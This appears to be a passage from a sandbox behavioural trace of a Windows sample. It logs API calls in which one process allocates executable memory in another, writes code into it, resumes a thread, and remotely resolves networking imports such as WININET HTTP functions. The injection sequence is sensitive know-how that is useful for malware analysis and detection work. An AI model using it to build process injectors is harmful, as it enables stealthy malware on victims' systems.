	[0225.266] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x56c, hTargetProcessHandle=0x62c, lpTargetHandle=0x12880c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x12880c*=0x8) returned 1
	[0225.266] GetCurrentProcess () returned 0xffffffff
	[0225.266] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x55c, hTargetProcessHandle=0x62c, lpTargetHandle=0x128810, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128810*=0xc) returned 1
	[0225.266] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0225.266] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1286b4 | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1286b4*=0x16f) returned 1
	[0225.267] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.267] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0225.267] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0225.268] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0225.268] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0225.268] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0225.268] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0225.268] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0225.269] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0225.269] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0x60000
	[0225.269] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128808*, nSize=0x70, lpNumberOfBytesWritten=0x1286b4 | out: lpBuffer=0x128808*, lpNumberOfBytesWritten=0x1286b4*=0x70) returned 1
	[0225.269] NtQueryInformationProcess (in: ProcessHandle=0x62c, ProcessInformationClass=0x0, ProcessInformation=0x12869c, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x12869c, ReturnLength=0x0) returned 0x0
	[0225.269] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x7ffd3000, lpBuffer=0x1286b4, nSize=0x10, lpNumberOfBytesRead=0x128540 | out: lpBuffer=0x1286b4*, lpNumberOfBytesRead=0x128540*=0x10) returned 1
	[0225.269] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x600000, lpBuffer=0x12865c, nSize=0x40, lpNumberOfBytesRead=0x128540 | out: lpBuffer=0x12865c*, lpNumberOfBytesRead=0x128540*=0x40) returned 1
	[0225.269] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x6000d8, lpBuffer=0x128564, nSize=0xf8, lpNumberOfBytesRead=0x128540 | out: lpBuffer=0x128564*, lpNumberOfBytesRead=0x128540*=0xf8) returned 1
	[0225.269] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x602104, lpBuffer=0x128878*, nSize=0xc, lpNumberOfBytesWritten=0x1286b4 | out: lpBuffer=0x128878*, lpNumberOfBytesWritten=0x1286b4*=0xc) returned 1
	[0225.270] ResetEvent (hEvent=0x56c) returned 1
	[0225.270] ResetEvent (hEvent=0x5d4) returned 1
	[0225.270] ResumeThread (hThread=0x628) returned 0x1
	[0225.285] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.285] VirtualAllocEx (hProcess=0x62c, lpAddress=0x10000000, dwSize=0x8000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000
	[0225.285] VirtualAllocEx (hProcess=0x62c, lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000
	[0225.285] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10000000, lpBuffer=0x27c8340*, nSize=0x400, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x27c8340*, lpNumberOfBytesWritten=0x1287dc*=0x400) returned 1
	[0225.286] VirtualProtectEx (in: hProcess=0x62c, lpAddress=0x10000000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0225.286] VirtualAllocEx (hProcess=0x62c, lpAddress=0x10001000, dwSize=0x2c00, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000
	[0225.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x2c00) returned 0x27ccb48
	[0225.286] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10001000, lpBuffer=0x27ccb48*, nSize=0x2c00, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x27ccb48*, lpNumberOfBytesWritten=0x1287c8*=0x2c00) returned 1
	[0225.287] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10001000, lpBuffer=0x27c8740*, nSize=0x2c00, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x27c8740*, lpNumberOfBytesWritten=0x1287dc*=0x2c00) returned 1
	[0225.287] VirtualAllocEx (hProcess=0x62c, lpAddress=0x10004000, dwSize=0x1200, flAllocationType=0x1000, flProtect=0x4) returned 0x10004000
	[0225.288] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27ccb48, Size=0x1200) returned 0x27ccb48
	[0225.288] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004000, lpBuffer=0x27ccb48*, nSize=0x1200, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x27ccb48*, lpNumberOfBytesWritten=0x1287c8*=0x1200) returned 1
	[0225.288] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004000, lpBuffer=0x27cb340*, nSize=0x1200, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x27cb340*, lpNumberOfBytesWritten=0x1287dc*=0x1200) returned 1
	[0225.288] VirtualAllocEx (hProcess=0x62c, lpAddress=0x10006000, dwSize=0x40c, flAllocationType=0x1000, flProtect=0x4) returned 0x10006000
	[0225.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27ccb48, Size=0x410) returned 0x27ccb48
	[0225.289] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10006000, lpBuffer=0x27ccb48*, nSize=0x40c, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x27ccb48*, lpNumberOfBytesWritten=0x1287c8*=0x40c) returned 1
	[0225.289] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10006000, lpBuffer=0x27cc540*, nSize=0x200, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x27cc540*, lpNumberOfBytesWritten=0x1287dc*=0x200) returned 1
	[0225.289] VirtualAllocEx (hProcess=0x62c, lpAddress=0x10007000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10007000
	[0225.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27ccb48, Size=0x400) returned 0x27ccb48
	[0225.289] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10007000, lpBuffer=0x27ccb48*, nSize=0x400, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x27ccb48*, lpNumberOfBytesWritten=0x1287c8*=0x400) returned 1
	[0225.290] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10007000, lpBuffer=0x27cc740*, nSize=0x400, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x27cc740*, lpNumberOfBytesWritten=0x1287dc*=0x400) returned 1
	[0225.290] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.290] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0225.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc178, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0225.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b5e8
	[0225.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc178, cbMultiByte=-1, lpWideCharStr=0x277b5e8, cchWideChar=11 | out: lpWideCharStr="WS2_32.dll") returned 11
	[0225.291] lstrlenW (lpString="WS2_32.dll") returned 10
	[0225.291] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.291] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x277b5e8*, nSize=0x16, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x277b5e8*, lpNumberOfBytesWritten=0x128674*=0x16) returned 1
	[0225.291] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0225.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.291] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.291] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0225.292] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0225.292] ResetEvent (hEvent=0x5d4) returned 1
	[0225.292] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.295] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0225.295] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.295] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.295] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277b5e8) returned 1
	[0225.296] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.296] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.296] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.296] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.296] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.296] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.297] ResetEvent (hEvent=0x5d4) returned 1
	[0225.297] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.297] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.297] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.297] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.297] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x100040a0, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.298] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.298] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0225.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc184, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0225.298] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b5e8
	[0225.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc184, cbMultiByte=-1, lpWideCharStr=0x277b5e8, cchWideChar=13 | out: lpWideCharStr="ACTIVEDS.dll") returned 13
	[0225.298] lstrlenW (lpString="ACTIVEDS.dll") returned 12
	[0225.298] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.298] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x277b5e8*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x277b5e8*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0225.298] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0225.298] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.298] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.299] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0225.299] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0225.299] ResetEvent (hEvent=0x5d4) returned 1
	[0225.299] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.328] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0225.328] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.328] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.328] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.328] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277b5e8) returned 1
	[0225.329] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.329] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.329] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.329] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.329] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.329] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.329] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.330] ResetEvent (hEvent=0x5d4) returned 1
	[0225.330] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.330] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.330] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.330] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.330] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004000, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.331] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.331] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0225.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc208, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0225.331] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b5e8
	[0225.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc208, cbMultiByte=-1, lpWideCharStr=0x277b5e8, cchWideChar=12 | out: lpWideCharStr="WININET.dll") returned 12
	[0225.331] lstrlenW (lpString="WININET.dll") returned 11
	[0225.331] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.331] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x277b5e8*, nSize=0x18, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x277b5e8*, lpNumberOfBytesWritten=0x128674*=0x18) returned 1
	[0225.332] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0225.332] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.332] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.332] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0225.332] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0225.332] ResetEvent (hEvent=0x5d4) returned 1
	[0225.332] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.388] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0225.388] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.388] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.389] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.389] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277b5e8) returned 1
	[0225.389] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.389] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.389] lstrlenA (lpString="HttpSendRequestW") returned 16
	[0225.389] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.389] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc1b8*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc1b8*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0225.390] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.390] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.390] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.390] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.391] ResetEvent (hEvent=0x5d4) returned 1
	[0225.391] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.391] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.391] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.391] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.391] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.391] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004084, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.392] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.392] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.392] lstrlenA (lpString="InternetConnectW") returned 16
	[0225.392] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.392] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc1e2*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc1e2*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0225.393] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.393] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.393] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.393] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.394] ResetEvent (hEvent=0x5d4) returned 1
	[0225.394] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.394] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.394] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.394] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.394] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.394] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004088, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.395] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.395] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.395] lstrlenA (lpString="HttpOpenRequestW") returned 16
	[0225.395] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.395] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc194*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc194*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0225.396] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.396] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.396] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.396] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.397] ResetEvent (hEvent=0x5d4) returned 1
